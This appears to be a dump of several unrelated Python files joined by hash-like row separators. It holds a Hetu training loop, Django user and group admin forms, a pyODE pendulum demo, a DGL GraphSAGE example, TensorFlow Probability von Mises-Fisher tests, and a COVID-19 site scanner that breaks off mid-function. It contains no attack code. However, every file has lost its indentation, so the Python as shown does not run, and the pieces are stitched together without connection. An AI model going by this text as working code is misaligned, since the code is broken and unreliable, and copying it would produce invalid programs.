opt = ht.optim.AdamOptimizer(learning_rate=args.learning_rate)
# data loading
print_rank0('Loading %s data...' % dataset)
if dataset == 'MNIST':
datasets = ht.data.mnist()
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# train_set_x: (50000, 784), train_set_y: (50000, 10)
# valid_set_x: (10000, 784), valid_set_y: (10000, 10)
# x_shape = (args.batch_size, 784)
# y_shape = (args.batch_size, 10)
elif dataset == 'CIFAR10':
train_set_x, train_set_y, valid_set_x, valid_set_y = ht.data.normalize_cifar(
num_class=10)
if args.model == "mlp":
train_set_x = train_set_x.reshape(train_set_x.shape[0], -1)
valid_set_x = valid_set_x.reshape(valid_set_x.shape[0], -1)
# train_set_x: (50000, 3, 32, 32), train_set_y: (50000, 10)
# valid_set_x: (10000, 3, 32, 32), valid_set_y: (10000, 10)
# x_shape = (args.batch_size, 3, 32, 32)
# y_shape = (args.batch_size, 10)
elif dataset == 'CIFAR100':
train_set_x, train_set_y, valid_set_x, valid_set_y = ht.data.normalize_cifar(
num_class=100)
# train_set_x: (50000, 3, 32, 32), train_set_y: (50000, 100)
# valid_set_x: (10000, 3, 32, 32), valid_set_y: (10000, 100)
else:
raise NotImplementedError
# model definition
print_rank0('Building model {}'.format(args.model))
x = ht.dataloader_op([
ht.Dataloader(train_set_x, args.batch_size, 'train'),
ht.Dataloader(valid_set_x, args.batch_size, 'validate'),
])
y_ = ht.dataloader_op([
ht.Dataloader(train_set_y, args.batch_size, 'train'),
ht.Dataloader(valid_set_y, args.batch_size, 'validate'),
])
if args.model in ['resnet18', 'resnet34', 'vgg16', 'vgg19'] and args.dataset == 'CIFAR100':
loss, y = model(x, y_, 100)
else:
loss, y = model(x, y_)
train_op = opt.minimize(loss)
eval_nodes = {'train': [loss, y, y_, train_op], 'validate': [loss, y, y_]}
executor = ht.Executor(eval_nodes, ctx=executor_ctx,
comm_mode=args.comm_mode)
n_train_batches = executor.get_batch_num('train')
n_valid_batches = executor.get_batch_num('validate')
# training
print_rank0("Start training loop...")
running_time = 0
for i in range(args.num_epochs + 1):
print_rank0("Epoch %d" % i)
loss_all = 0
batch_num = 0
if args.timing:
start = time()
correct_predictions = []
for minibatch_index in range(n_train_batches):
loss_val, predict_y, y_val, _ = executor.run(
'train', eval_node_list=[loss, y, y_, train_op])
# Loss for this minibatch
predict_y = predict_y.asnumpy()
y_val = y_val.asnumpy()
loss_all += loss_val.asnumpy()
batch_num += 1
# Predict accuracy for this minibatch
correct_prediction = np.equal(
np.argmax(y_val, 1),
np.argmax(predict_y, 1)).astype(np.float32)
correct_predictions.extend(correct_prediction)
loss_all /= batch_num
accuracy = np.mean(correct_predictions)
print_rank0("Train loss = %f" % loss_all)
print_rank0("Train accuracy = %f" % accuracy)
if args.timing:
end = time()
during_time = end - start
print_rank0("Running time of current epoch = %fs" % (during_time))
if i != 0:
running_time += during_time
if args.validate:
val_loss_all = 0
batch_num = 0
correct_predictions = []
for minibatch_index in range(n_valid_batches):
loss_val, valid_y_predicted, y_val = executor.run(
'validate', eval_node_list=[loss, y, y_], convert_to_numpy_ret_vals=True)
val_loss_all += loss_val
batch_num += 1
correct_prediction = np.equal(
np.argmax(y_val, 1),
np.argmax(valid_y_predicted, 1)).astype(np.float32)
correct_predictions.extend(correct_prediction)
val_loss_all /= batch_num
accuracy = np.mean(correct_predictions)
print_rank0("Validation loss = %f" % val_loss_all)
print_rank0("Validation accuracy = %f" % accuracy)
print_rank0("*"*50)
print_rank0("Running time of total %d epoch = %fs" %
(args.num_epochs, running_time))
if args.comm_mode in ('AllReduce', 'Hybrid'):
ht.mpi_nccl_finish(comm)
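# Hypothetical invocation sketch (the script file name and the concrete flag
# values below are assumptions; only the flag names come from the argparse
# definitions above):
#   python run_hetu.py --model resnet18 --dataset CIFAR10 \
#       --batch-size 128 --learning-rate 0.1 --opt momentum \
#       --num-epochs 10 --gpu 0 --validate --timing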
|
py | 1a4a2266a3876d173bf9c16b1b75d978db0c182e | from django import forms
from django.contrib.auth.models import Group, User
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from django.urls import reverse_lazy
from django.utils.text import format_lazy
from django.utils.translation import gettext_lazy as _
from accounts.models import UserAttributes
from .models import Permission
class GroupForm(forms.ModelForm):
permissions = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=Permission.objects.filter(content_type__model='permissionset'),
required=False,
)
users = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=User.objects.all(),
required=False,
)
def __init__(self, *args, **kwargs):
super(GroupForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance.id:
self.fields['users'].initial = self.instance.user_set.all()
def save_m2m(self):
self.instance.user_set.set(self.cleaned_data['users'])
def save(self, *args, **kwargs):
instance = super(GroupForm, self).save()
self.save_m2m()
return instance
class Meta:
model = Group
fields = '__all__'
class UserForm(forms.ModelForm):
user_permissions = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=Permission.objects.filter(content_type__model='permissionset'),
label=_('Permissions'),
required=False,
)
groups = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=Group.objects.all(),
label=_('Groups'),
required=False,
)
class Meta:
model = User
fields = [
'username',
'groups',
'first_name',
'last_name',
'email',
'user_permissions',
'is_staff',
'is_active',
'is_superuser',
]
def __init__(self, *args, **kwargs):
super(UserForm, self).__init__(*args, **kwargs)
if self.instance.id:
password = ReadOnlyPasswordHashField(
label=_("Password"),
help_text=format_lazy(_("""Raw passwords are not stored, so there is no way to see
this user's password, but you can change the password using <a href='{}'>this form</a>."""),
reverse_lazy('admin:user_update_password',
args=[self.instance.id,]))
)
self.fields['Password'] = password
class UserCreateForm(UserForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = User
fields = [
'username',
'password',
'groups',
'first_name',
'last_name',
'email',
'user_permissions',
'is_staff',
'is_active',
'is_superuser',
]
class UserAttributesForm(forms.ModelForm):
class Meta:
model = UserAttributes
exclude = ['user', 'can_clone_instances']
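# Minimal usage sketch (illustrative only; the view name and URL handling are
# assumptions, not part of this module). GroupForm exposes the group's members
# through the extra `users` field and syncs them back in save()/save_m2m():
#
#   def group_update_view(request, group_id):      # hypothetical view
#       group = Group.objects.get(pk=group_id)
#       form = GroupForm(request.POST or None, instance=group)
#       if request.method == 'POST' and form.is_valid():
#           form.save()   # also updates group.user_set from cleaned_data['users']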
|
py | 1a4a228b389a69dd885dc47358fa589ae08a8f23 | #!/usr/bin/env python
# http://pyode.sourceforge.net/tutorials/tutorial2.html
# pyODE example 2: Connecting bodies with joints
# modified by Gideon Klompje (removed literals and using
# 'ode.Mass.setSphereTotal' instead of 'ode.Mass.setSphere')
import ode
import pygame
from pygame.locals import QUIT, KEYDOWN
# Constants
WINDOW_RESOLUTION = (640, 480)
DRAW_SCALE = WINDOW_RESOLUTION[0] / 5
"""Factor to multiply physical coordinates by to obtain screen size in pixels"""
DRAW_OFFSET = (WINDOW_RESOLUTION[0] / 2, 50)
"""Screen coordinates (in pixels) that map to the physical origin (0, 0, 0)"""
BACKGROUND_COLOR = (255, 255, 255)
GRAVITY = (0, -9.81, 0)
SPHERE1_POSITION = (1, 0, 0)
SPHERE1_MASS = 1
SPHERE1_RADIUS = 0.15
SPHERE1_COLOR = (55, 0, 200)
SPHERE2_POSITION = (2, 0, 0)
SPHERE2_MASS = 1
SPHERE2_RADIUS = 0.15
SPHERE2_COLOR = (55, 0, 200)
JOINT1_ANCHOR = (0, 0, 0)
JOINT1_COLOR = (200, 0, 55)
JOINT1_WIDTH = 2
"""Width of the line (in pixels) representing the joint"""
JOINT2_ANCHOR = SPHERE1_POSITION
JOINT2_COLOR = (200, 0, 55)
JOINT2_WIDTH = 2
"""Width of the line (in pixels) representing the joint"""
TIME_STEP = 0.04
# Utility functions
def coord(x, y, integer=False):
"""
Convert world coordinates to pixel coordinates. Setting 'integer' to
True will return integer coordinates.
"""
xs = (DRAW_OFFSET[0] + DRAW_SCALE*x)
ys = (DRAW_OFFSET[1] - DRAW_SCALE*y)
if integer:
return int(round(xs)), int(round(ys))
else:
return xs, ys
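# Worked example for the constants above (DRAW_SCALE = 640 / 5 = 128,
# DRAW_OFFSET = (320, 50)): the physical origin maps to pixel (320, 50), one
# world unit along +x maps 128 pixels to the right, and +y points up on
# screen (pixel y decreases).
#   coord(0, 0, integer=True)  # -> (320, 50)
#   coord(1, 0, integer=True)  # -> (448, 50)
#   coord(0, 1, integer=True)  # -> (320, -78)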
# Initialize pygame
pygame.init()
# Open a display
screen = pygame.display.set_mode(WINDOW_RESOLUTION)
# Create a world object
world = ode.World()
world.setGravity(GRAVITY)
# Create two bodies
body1 = ode.Body(world)
M = ode.Mass()
M.setSphereTotal(SPHERE1_MASS, SPHERE1_RADIUS)
body1.setMass(M)
body1.setPosition(SPHERE1_POSITION)
body2 = ode.Body(world)
M = ode.Mass()
M.setSphereTotal(SPHERE2_MASS, SPHERE2_RADIUS)
body2.setMass(M)
body2.setPosition(SPHERE2_POSITION)
# Connect body1 with the static environment
j1 = ode.BallJoint(world)
j1.attach(body1, ode.environment)
j1.setAnchor(JOINT1_ANCHOR)
# Connect body2 with body1
j2 = ode.BallJoint(world)
j2.attach(body1, body2)
j2.setAnchor(JOINT2_ANCHOR)
# Simulation loop...
if __name__ == "__main__":
fps = 1.0 / TIME_STEP
clk = pygame.time.Clock()
sph1_rad = int(DRAW_SCALE * SPHERE1_RADIUS)
sph2_rad = int(DRAW_SCALE * SPHERE2_RADIUS)
loopFlag = True
while loopFlag:
for e in pygame.event.get():
if e.type==QUIT:
loopFlag=False
if e.type==KEYDOWN:
loopFlag=False
# Clear the screen
screen.fill(BACKGROUND_COLOR)
# Draw the two bodies and the lines representing the joints
x1, y1, z1 = body1.getPosition()
x2, y2, z2 = body2.getPosition()
xj1, yj1, zj1 = j1.getAnchor()
xj2, yj2, zj2 = j2.getAnchor()
pygame.draw.line(screen, JOINT1_COLOR, coord(xj1, yj1), coord(x1, y1), JOINT1_WIDTH)
pygame.draw.line(screen, JOINT2_COLOR, coord(xj2, yj2), coord(x2, y2), JOINT2_WIDTH)
pygame.draw.circle(screen, SPHERE1_COLOR, coord(x1, y1, integer=True), sph1_rad, 0)
pygame.draw.circle(screen, SPHERE2_COLOR, coord(x2, y2, integer=True), sph2_rad, 0)
pygame.display.flip()
# Next simulation step
world.step(TIME_STEP)
# Try to keep the specified framerate
clk.tick(fps)
|
py | 1a4a22eea78b91f31105d6c77b84686d5bd1f275 | """
Inductive Representation Learning on Large Graphs
Paper: http://papers.nips.cc/paper/6703-inductive-representation-learning-on-large-graphs.pdf
Code: https://github.com/williamleif/graphsage-simple
Simple reference implementation of GraphSAGE.
"""
import argparse
import time
import abc
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dgl import DGLGraph
from dgl.data import register_data_args, load_data
from dgl.nn.pytorch.conv import SAGEConv
class GraphSAGE(nn.Module):
def __init__(self,
g,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout,
aggregator_type):
super(GraphSAGE, self).__init__()
self.layers = nn.ModuleList()
self.g = g
# input layer
self.layers.append(SAGEConv(in_feats, n_hidden, aggregator_type, feat_drop=dropout, activation=activation))
# hidden layers
for i in range(n_layers - 1):
self.layers.append(SAGEConv(n_hidden, n_hidden, aggregator_type, feat_drop=dropout, activation=activation))
# output layer
self.layers.append(SAGEConv(n_hidden, n_classes, aggregator_type, feat_drop=dropout, activation=None)) # activation None
def forward(self, features):
h = features
for layer in self.layers:
h = layer(self.g, h)
return h
def evaluate(model, features, labels, mask):
model.eval()
with torch.no_grad():
logits = model(features)
logits = logits[mask]
labels = labels[mask]
_, indices = torch.max(logits, dim=1)
correct = torch.sum(indices == labels)
return correct.item() * 1.0 / len(labels)
def main(args):
# load and preprocess dataset
data = load_data(args)
features = torch.FloatTensor(data.features)
labels = torch.LongTensor(data.labels)
train_mask = torch.ByteTensor(data.train_mask)
val_mask = torch.ByteTensor(data.val_mask)
test_mask = torch.ByteTensor(data.test_mask)
in_feats = features.shape[1]
n_classes = data.num_labels
n_edges = data.graph.number_of_edges()
print("""----Data statistics------'
#Edges %d
#Classes %d
#Train samples %d
#Val samples %d
#Test samples %d""" %
(n_edges, n_classes,
train_mask.sum().item(),
val_mask.sum().item(),
test_mask.sum().item()))
if args.gpu < 0:
cuda = False
else:
cuda = True
torch.cuda.set_device(args.gpu)
features = features.cuda()
labels = labels.cuda()
train_mask = train_mask.cuda()
val_mask = val_mask.cuda()
test_mask = test_mask.cuda()
print("use cuda:", args.gpu)
# graph preprocess and calculate normalization factor
g = data.graph
g.remove_edges_from(g.selfloop_edges())
g = DGLGraph(g)
n_edges = g.number_of_edges()
# create GraphSAGE model
model = GraphSAGE(g,
in_feats,
args.n_hidden,
n_classes,
args.n_layers,
F.relu,
args.dropout,
args.aggregator_type
)
if cuda:
model.cuda()
loss_fcn = torch.nn.CrossEntropyLoss()
# use optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
# initialize graph
dur = []
for epoch in range(args.n_epochs):
model.train()
if epoch >= 3:
t0 = time.time()
# forward
logits = model(features)
loss = loss_fcn(logits[train_mask], labels[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch >= 3:
dur.append(time.time() - t0)
acc = evaluate(model, features, labels, val_mask)
print("Epoch {:05d} | Time(s) {:.4f} | Loss {:.4f} | Accuracy {:.4f} | "
"ETputs(KTEPS) {:.2f}".format(epoch, np.mean(dur), loss.item(),
acc, n_edges / np.mean(dur) / 1000))
print()
acc = evaluate(model, features, labels, test_mask)
print("Test Accuracy {:.4f}".format(acc))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='GraphSAGE')
register_data_args(parser)
parser.add_argument("--dropout", type=float, default=0.5,
help="dropout probability")
parser.add_argument("--gpu", type=int, default=-1,
help="gpu")
parser.add_argument("--lr", type=float, default=1e-2,
help="learning rate")
parser.add_argument("--n-epochs", type=int, default=200,
help="number of training epochs")
parser.add_argument("--n-hidden", type=int, default=16,
help="number of hidden gcn units")
parser.add_argument("--n-layers", type=int, default=1,
help="number of hidden gcn layers")
parser.add_argument("--weight-decay", type=float, default=5e-4,
help="Weight for L2 loss")
parser.add_argument("--aggregator-type", type=str, default="gcn",
help="Aggregator type: mean/gcn/pool/lstm")
args = parser.parse_args()
print(args)
main(args)
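# Hypothetical invocation (the file name is an assumption; `--dataset` is added
# by dgl.data.register_data_args, and "cora" is one of the standard choices):
#   python graphsage_train.py --dataset cora --gpu 0 --aggregator-type mean --n-epochs 200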
|
py | 1a4a23c9846ff482afa454292363724ca0cac02a | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for multivariate von Mises-Fisher distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.distributions.von_mises_fisher import _bessel_ive
from tensorflow_probability.python.internal import test_util as tfp_test_util
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
@test_util.run_all_in_graph_and_eager_modes
class VonMisesFisherTest(tfp_test_util.VectorDistributionTestHelpers,
tf.test.TestCase):
def testBesselIve(self):
self.assertRaises(ValueError, lambda: _bessel_ive(2.0, 1.0))
# Zero is not a supported value for z.
self.assertRaises(tf.errors.InvalidArgumentError,
lambda: self.evaluate(_bessel_ive(1.5, 0.0)))
z = np.logspace(-6, 2, 20).astype(np.float64)
for v in np.float64([-0.5, 0, 0.5, 1, 1.5]):
try:
from scipy import special # pylint:disable=g-import-not-at-top
except ImportError:
tf.compat.v1.logging.warn('Skipping scipy-dependent tests')
return
self.assertAllClose(special.ive(v, z), _bessel_ive(v, z))
def testSampleMeanDir2d(self):
mean_dirs = tf.nn.l2_normalize([[1., 1],
[-2, 1],
[0, -1]], axis=-1)
concentration = [[0], [0.1], [2], [40], [1000]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dirs,
concentration=concentration,
validate_args=True,
allow_nan_stats=False)
self.assertEqual([5, 3], vmf.batch_shape.as_list())
self.assertEqual([2], vmf.event_shape.as_list())
nsamples = 12000
samples = vmf.sample(sample_shape=[nsamples])
self.assertEqual([nsamples, 5, 3, 2], samples.shape.as_list())
sample_mean = self.evaluate(samples).mean(axis=0)
# Assert that positive-concentration distributions have samples with
# the expected mean direction.
sample_dir = (
sample_mean / np.linalg.norm(sample_mean, axis=-1, keepdims=True))
inner_product = self.evaluate(
tf.reduce_sum(input_tensor=sample_dir * vmf.mean_direction, axis=-1))
# All except the 0-concentration distribution should have >0 inner product
# with the mean direction of the distribution.
self.assertAllGreater(inner_product[1:], 0.1)
# Pick out >1 concentration distributions to assert ~1 inner product with
# mean direction.
self.assertAllClose(np.ones_like(inner_product)[2:], inner_product[2:],
atol=1e-3)
# Inner products should be roughly ascending by concentration.
self.assertAllEqual(np.round(np.sort(inner_product, axis=0), decimals=3),
np.round(inner_product, decimals=3))
means = self.evaluate(vmf.mean())
# Mean vector for 0-concentration is precisely (0, 0).
self.assertAllEqual(np.zeros_like(means[0]), means[0])
mean_lengths = np.linalg.norm(means, axis=-1)
# Length of the mean vector is strictly ascending with concentration.
self.assertAllEqual(mean_lengths, np.sort(mean_lengths, axis=0))
self.assertAllClose(np.linalg.norm(sample_mean, axis=-1), mean_lengths,
atol=0.02)
def testSampleMeanDir3d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3],
[-2, -3, -1]], axis=-1)
concentration = [[0], [0.1], [2], [40], [1000]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir,
concentration=concentration,
validate_args=True,
allow_nan_stats=False)
self.assertEqual([5, 2], vmf.batch_shape.as_list())
self.assertEqual([3], vmf.event_shape.as_list())
nsamples = int(2e4)
samples = vmf.sample(sample_shape=[nsamples])
self.assertEqual([nsamples, 5, 2, 3], samples.shape.as_list())
sample_mean = self.evaluate(samples).mean(axis=0)
# Assert that positive-concentration distributions have samples with
# the expected mean direction.
sample_dir = (
sample_mean / np.linalg.norm(sample_mean, axis=-1, keepdims=True))
inner_product = self.evaluate(
tf.reduce_sum(input_tensor=sample_dir * vmf.mean_direction, axis=-1))
# All except the 0-concentration distribution should have >0 inner product
# with the mean direction of the distribution.
self.assertAllGreater(inner_product[1:], 0.1)
# Pick out >1 concentration distributions to assert ~1 inner product with
# mean direction.
self.assertAllClose(np.ones_like(inner_product)[2:], inner_product[2:],
atol=1e-3)
# Inner products should be roughly ascending by concentration.
self.assertAllEqual(np.round(np.sort(inner_product, axis=0), decimals=3),
np.round(inner_product, decimals=3))
means = self.evaluate(vmf.mean())
# Mean vector for 0-concentration is precisely (0, 0, 0).
self.assertAllEqual(np.zeros_like(means[0]), means[0])
mean_lengths = np.linalg.norm(means, axis=-1)
# Length of the mean vector is strictly ascending with concentration.
self.assertAllEqual(mean_lengths, np.sort(mean_lengths, axis=0))
self.assertAllClose(np.linalg.norm(sample_mean, axis=-1), mean_lengths,
atol=0.02)
def _verifyPdfWithNumpy(self, vmf, atol=1e-4):
"""Verifies log_prob evaluations with numpy/scipy.
Both uniform random points and sampled points are evaluated.
Args:
vmf: A `tfp.distributions.VonMisesFisher` instance.
atol: Absolute difference tolerable.
"""
dim = tf.compat.dimension_value(vmf.event_shape[-1])
nsamples = 10
# Sample some random points uniformly over the hypersphere using numpy.
sample_shape = [nsamples] + vmf.batch_shape.as_list() + [dim]
uniforms = np.random.randn(*sample_shape)
uniforms /= np.linalg.norm(uniforms, axis=-1, keepdims=True)
uniforms = uniforms.astype(vmf.dtype.as_numpy_dtype)
# Concatenate in some sampled points from the distribution under test.
samples = tf.concat([uniforms, vmf.sample(sample_shape=[nsamples])], axis=0)
samples = tf.debugging.check_numerics(samples, 'samples')
samples = self.evaluate(samples)
log_prob = vmf.log_prob(samples)
log_prob = tf.debugging.check_numerics(log_prob, 'log_prob')
try:
from scipy.special import gammaln # pylint: disable=g-import-not-at-top
from scipy.special import ive # pylint: disable=g-import-not-at-top
except ImportError:
tf.compat.v1.logging.warn('Unable to use scipy in tests')
return
conc = self.evaluate(vmf.concentration)
mean_dir = self.evaluate(vmf.mean_direction)
log_true_sphere_surface_area = (
np.log(2) + (dim / 2) * np.log(np.pi) - gammaln(dim / 2))
expected = (
conc * np.sum(samples * mean_dir, axis=-1) +
np.where(conc > 0,
(dim / 2 - 1) * np.log(conc) -
(dim / 2) * np.log(2 * np.pi) -
np.log(ive(dim / 2 - 1, conc)) -
np.abs(conc),
-log_true_sphere_surface_area))
self.assertAllClose(expected, self.evaluate(log_prob),
atol=atol)
def _verifySampleAndPdfConsistency(self, vmf, rtol=0.075):
"""Verifies samples are consistent with the PDF using importance sampling.
    In particular, we verify an estimate of the surface area of the n-dimensional
hypersphere, and the surface areas of the spherical caps demarcated by
a handful of survival rates.
Args:
vmf: A `VonMisesFisher` distribution instance.
rtol: Relative difference tolerable.
"""
dim = tf.compat.dimension_value(vmf.event_shape[-1])
nsamples = 50000
samples = vmf.sample(sample_shape=[nsamples])
samples = tf.debugging.check_numerics(samples, 'samples')
log_prob = vmf.log_prob(samples)
log_prob = tf.debugging.check_numerics(log_prob, 'log_prob')
log_importance = -log_prob
sphere_surface_area_estimate, samples, importance, conc = self.evaluate([
tf.exp(
tf.reduce_logsumexp(input_tensor=log_importance, axis=0) -
tf.math.log(tf.cast(nsamples, dtype=tf.float32))), samples,
tf.exp(log_importance), vmf.concentration
])
true_sphere_surface_area = 2 * (np.pi)**(dim / 2) * self.evaluate(
tf.exp(-tf.math.lgamma(dim / 2)))
# Broadcast to correct size
true_sphere_surface_area += np.zeros_like(sphere_surface_area_estimate)
# Highly concentrated distributions do not get enough coverage to provide
# a reasonable full-sphere surface area estimate. These are covered below
# by CDF-based hypersphere cap surface area estimates.
self.assertAllClose(
true_sphere_surface_area[np.where(conc < 3)],
sphere_surface_area_estimate[np.where(conc < 3)],
rtol=rtol)
    # Assert the surface area of the hyperspherical cap for some CDFs in
    # [.05, .45] (h must be greater than 0 for the hypersphere cap surface
    # area calculation to hold).
for survival_rate in 0.95, .9, .75, .6:
cdf = (1 - survival_rate)
mean_dir = self.evaluate(vmf.mean_direction)
dotprods = np.sum(samples * mean_dir, -1)
# Empirical estimate of the effective dot-product of the threshold that
# selects for a given CDF level, that is the cosine of the largest
# passable angle, or the minimum cosine for a within-CDF sample.
dotprod_thresh = np.percentile(
dotprods, 100 * survival_rate, axis=0, keepdims=True)
dotprod_above_thresh = np.float32(dotprods > dotprod_thresh)
sphere_cap_surface_area_ests = (
cdf * (importance * dotprod_above_thresh).sum(0) /
dotprod_above_thresh.sum(0))
h = (1 - dotprod_thresh)
self.assertGreaterEqual(h.min(), 0) # h must be >= 0 for the eqn below
true_sphere_cap_surface_area = (
0.5 * true_sphere_surface_area *
self.evaluate(tf.math.betainc((dim - 1) / 2, 0.5, 2 * h - h**2)))
if dim == 3: # For 3-d we have a simpler form we can double-check.
self.assertAllClose(2 * np.pi * h, true_sphere_cap_surface_area)
self.assertAllClose(
true_sphere_cap_surface_area,
sphere_cap_surface_area_ests +
np.zeros_like(true_sphere_cap_surface_area),
rtol=rtol)
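    # Worked check of the closed form used above (illustrative, not an extra
    # test): the surface area of the unit hypersphere in `dim` dimensions is
    #   A(dim) = 2 * pi**(dim / 2) / gamma(dim / 2)
    # so dim=2 gives 2*pi (the unit circle's circumference) and dim=3 gives
    # 4*pi, which matches the special-cased 3-d cap formula 2*pi*h at h = 2.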
def _verifyCovariance(self, vmf):
dim = tf.compat.dimension_value(vmf.event_shape[-1])
nsamples = 10000
samples = vmf.sample(nsamples)
samples = tf.debugging.check_numerics(samples, 'samples')
cov = vmf.covariance()
samples, cov = self.evaluate([samples, cov])
batched_samples = np.reshape(samples, [nsamples, -1, dim])
batch_size = batched_samples.shape[1]
est_cov = np.zeros([batch_size, dim, dim], dtype=cov.dtype)
for bi in range(batched_samples.shape[1]):
est_cov[bi] = np.cov(batched_samples[:, bi], rowvar=False)
self.assertAllClose(
np.reshape(est_cov, cov.shape),
cov,
atol=0.015)
def testSampleAndPdfConsistency2d(self):
mean_dir = tf.nn.l2_normalize([[1., 2],
[-2, -3]], axis=-1)
concentration = [[0], [1e-5], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf)
def testSampleAndPdfConsistency3d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3],
[-2, -3, -1]], axis=-1)
concentration = [[0], [1e-5], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
# TODO(bjp): Enable self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf, atol=.002)
def testSampleAndPdfConsistency4d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3, 4],
[-2, -3, -1, 0]], axis=-1)
concentration = [[0], [1e-4], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
# TODO(bjp): Enable self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf)
def testSampleAndPdfConsistency5d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3, 4, 5],
[-2, -3, -1, 0, 1]], axis=-1)
# TODO(bjp): Numerical instability 0 < k < 1e-2 concentrations.
# Should resolve by eliminating the bessel_i recurrence in favor of
# a more stable algorithm, e.g. cephes.
concentration = [[0], [5e-2], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
# TODO(bjp): Enable self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf)
if __name__ == '__main__':
tf.test.main()
|
py | 1a4a2404ab3ce6b68a768a4c2b54d82e2c0ad1b3 | """
scanner
Scan the COVID-19 government sites.
Data is fetched and cleaned, then pushed to a git repo.
Files are only updated if the cleaned version changes.
"""
from argparse import ArgumentParser, Namespace, RawDescriptionHelpFormatter
import configparser
import sys
import os
from datetime import datetime, timezone, timedelta
import time
from loguru import logger
from typing import List, Dict, Tuple
from data_pipeline import DataPipeline, DataPipelineConfig
from specialized_capture import SpecializedCapture, special_cases
from util import get_host
import udatetime
import util_git
# ----------------------
parser = ArgumentParser(
description=__doc__,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument(
'-f', '--format', dest='format_html', action='store_true', default=False,
help='run the html formater (only)')
parser.add_argument(
'-c', '--clean', dest='clean_html', action='store_true', default=False,
help='run the html cleaner (only)')
parser.add_argument(
'-x', '--extract', dest='extract_html', action='store_true', default=False,
help='run the html extractor (only)')
parser.add_argument('--trace', dest='trace', action='store_true', default=False,
help='turn on tracing')
parser.add_argument('-a', '--auto_push', dest='auto_push', action='store_true', default=False,
help='checkin data to the git repo at end of run')
parser.add_argument('--rerun_now', dest='rerun_now', action='store_true', default=False,
help='include items that were fetched in the last 15 minutes')
parser.add_argument('--continuous', dest='continuous', action='store_true', default=False,
help='Run at 0:05 and 0:35')
parser.add_argument('--auto_update', dest='auto_update', action='store_true', default=False,
help='Pull changes and restart if source has changed')
parser.add_argument('--guarded', dest='guarded', action='store_true', default=False)
parser.add_argument('--firefox', dest='use_firefox', action='store_true', default=False,
help='capture using firefox')
parser.add_argument('--chrome', dest='use_chrome', action='store_true', default=False,
help='capture using chrome')
parser.add_argument('--show_browser', dest='show_browser', action='store_true', default=False,
help='show browser while running')
parser.add_argument('-i', '--image', dest='capture_image', action='store_true', default=False,
help='capture image after each change')
# data dir args
config = configparser.ConfigParser()
if os.path.exists("data_pipeline.local.ini"):
config.read('data_pipeline.local.ini')
elif os.path.exists("data_pipeline.ini"):
config.read('data_pipeline.ini')
else:
raise Exception("Missing data_pipeline.ini file")
parser.add_argument(
'--base_dir',
default=config["DIRS"]["base_dir"],
help='Local GitHub repo dir for corona19-data-archive')
parser.add_argument(
'--temp_dir',
default=config["DIRS"]["temp_dir"],
help='Local temp dir for snapshots')
# ----
def next_time() -> datetime:
t = datetime.now()
xmin = t.minute
if xmin < 25:
xmin = 35
elif xmin < 55:
t = t + timedelta(hours=1)
xmin = 5
else:
t = t + timedelta(hours=1)
xmin = 35
t = datetime(t.year, t.month, t.day, t.hour, xmin, 0)
return t
def init_specialized_capture(args: Namespace) -> SpecializedCapture:
temp_dir = args.temp_dir
publish_dir = os.path.join(args.base_dir, "captive-browser")
capture = SpecializedCapture(temp_dir, publish_dir)
return capture
def run_continuous(scanner: DataPipeline, capture: SpecializedCapture, auto_push: bool):
if util_git.monitor_check(): return
host = get_host()
try:
print("starting continuous run")
scanner.update_sources()
scanner.process()
if capture:
try:
special_cases(capture)
except Exception as ex:
logger.error(ex)
logger.error("*** continue after exception in specialized capture")
if auto_push: util_git.push(scanner.config.base_dir, f"{udatetime.to_logformat(scanner.change_list.start_date)} on {host}")
